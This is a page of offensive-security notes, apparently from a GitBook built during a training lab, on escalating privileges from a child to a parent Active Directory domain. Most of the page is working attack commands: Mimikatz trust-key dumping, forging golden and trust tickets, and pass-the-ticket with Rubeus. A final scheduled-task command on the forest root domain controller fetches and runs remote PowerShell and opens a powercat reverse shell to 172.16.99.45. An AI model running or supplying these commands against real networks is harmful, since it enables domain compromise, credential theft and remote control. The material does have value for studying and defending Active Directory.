RFC - Offensive Security Notes
  • Active Directory
    • Enumeration
      • Active Directory Module
        • Enumerating the Domain
        • Enumerating ACLs
      • PowerView 3.0
      • Verify connectivity to domain controller
      • WMI domain enumeration through root\directory\ldap
      • PAM Trust
      • DNS discovery
        • Get-DnsServerZone
    • Privilege Escalation
      • Kerberos Delegation
        • Unconstrained delegation
        • Constrained delegation
        • Resource-based Constrained Delegation
      • Escalating from child to parent domain
      • Abusing inter-forest trust
      • WSUS server abuse
      • ACL Enumeration with PowerView 2.0
    • Persistence
      • Kerberos attacks
        • Golden ticket
        • Silver ticket
      • DSRM (Directory Services Restore Mode)
  • Initial Access
    • VBA Macros
      • Mark-of-the-Web
  • Discovery
    • Juicy files
      • PowerShell history
    • Network Enumeration
      • Network discovery scans
        • Ping scan
      • Nmap
      • Perimeter firewall scanning for open outbound ports
  • Execution
    • WMI
      • Remote code execution using WMI
    • PowerShell
      • C# assembly in PowerShell
        • List load assembly
        • Add-Type
        • UnsafeNativeMethods
        • DelegateType Reflection
        • Reflective Load
    • C# .Net Assembly
      • Process injection
        • Debugging
        • Using VirtualAllocEx and WriteProcessMemory
        • Using NTAPI Undocumented Functions
    • ReverseShells
      • Linux
        • Stabilizing zsh shell
    • Metasploit
      • HTTPs Meterpreter
  • Exploitation
    • Win32 APIs
      • OpenProcess
      • VirtualAllocEx
      • WriteProcessMemory
      • CreateRemoteThread
  • Credential Access
    • Microsoft Windows
      • Windows credential audit and logon types
      • Local credentials (SAM and LSA)
      • Lsass from forensics dump
      • Access Tokens
        • SeImpersonatePrivilege
      • ntds.dit
        • Dumping the contents of ntds.dit files using PowerShell
      • Mimikatz
      • LAPS
  • Lateral Movement
    • Windows Lateral Movement
      • Remote Desktop Protocol (RDP)
      • PowerShell Remoting (PS Remote)
        • Kerberos double hoping
      • Windows Task Scheduler
    • Linux Lateral Movement
  • Persistence
  • Defence Evasion
    • Antimalware Scan Interface (AMSI)
      • Debugging AMSI with Frida
      • PowerShell Bypasses
      • JS/VBA Bypasses
    • PowerShell
      • PowerShell version 2
      • Constrained Language Mode
      • Just Enough Administration (JEA)
      • ScriptBlockLogging
    • Microsoft Defender
    • Anti-virus evasion
      • Evasion and bypassing detection within C#
        • Encryptors
          • Aes encryptor
        • Sandbox evasion
          • Time accelerated checks
    • AppLocker
      • InstallUtil
      • MsBuild
  • Network Pivoting
    • Proxies and port fowarding
      • SSH
      • Metasploit
      • Socat
      • SSH Shuttle
      • Windows netsh command
    • Network discovery and scanning
  • Exfiltration
    • Windows
      • Copy files over SMB
  • Services
    • MS SQL Server
      • Enumeration
      • UNC Path Injection
      • Privilege Escalation
      • Linked Servers
      • SQL Injection
  • Misc
    • CrackMapExec
    • Cheat sheets
  • Cloud
    • Azure
      • Authentication
      • Enumeration
        • AzureHound
        • Az.Powershell
        • Microsoft Graph PowerShell
      • Initial Access
        • Device Code Phishing
        • Family-Of-Client-Ids - FOCI
        • JWT Assertion
Powered by GitBook
On this page
  • Method 1: Trust ticket
  • Forging trust ticket
  • Method 2: Krbtgt hash
  • Remote code execution on forest root domain controller
  1. Active Directory
  2. Privilege Escalation

Escalating from child to parent domain

Domains in same forest have an implicit two-way trust with other domains. There is a trust key between the parent and child domains.

There are two ways of escalating privileges between two domains of same forest:

  • Krbtgt hash

  • Trust tickets

Method 1: Trust ticket

Child to Forest Root using Trust Tickets requires the trust key. (Look for [In] trust key from child to parent)

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc

Forging trust ticket

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:[child domain] /sid:[sid of child domain] /sids:[sid of parent domain]-519 /rc4:[trust key] /service:krbtgt /target:[parent domain] /ticket:[ticket name]"'

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:b543d42b31a43e9eab1466fe5ae8e0e3 /service:krbtgt /target:moneycorp.local"'

Invoke-Rubeus -Command "asktgs /ticket:[trust ticket name] /service:CIFS/[parent domain controller FQDN] /dc:[parent domain controller FQDN] /outfile:[trust name]"

Invoke-Rubeus -Command "asktgs /ticket:trust.kirbi /service:CIFS/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /outfile:mcorpEA.kirbi"

Invoke-Rubeus -Command "ptt /ticket:[ticket name]"

Invoke-Rubeus -Command "ptt /ticket:mcorpEA.kirbi"

ls \\mcorp-dc.moneycorp.local\c$

Method 2: Krbtgt hash

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:[child domain] /sid:[sid of child domain] /sids:[sid of parent domain]-519 /krbtgt:[krbtgt hash] /ptt"'

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ptt"'

Remote code execution on forest root domain controller

## Verify admin rights 
gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local

## Create scheduled task
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (iwr http://172.16.99.45/crtp/exploit_rev/enc_power.ps1 -UseBasicParsing); powercat -c 172.16.99.45 -p 9002 -ep'"

## Execute scheduled task
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
PreviousResource-based Constrained DelegationNextAbusing inter-forest trust

Last updated 2 years ago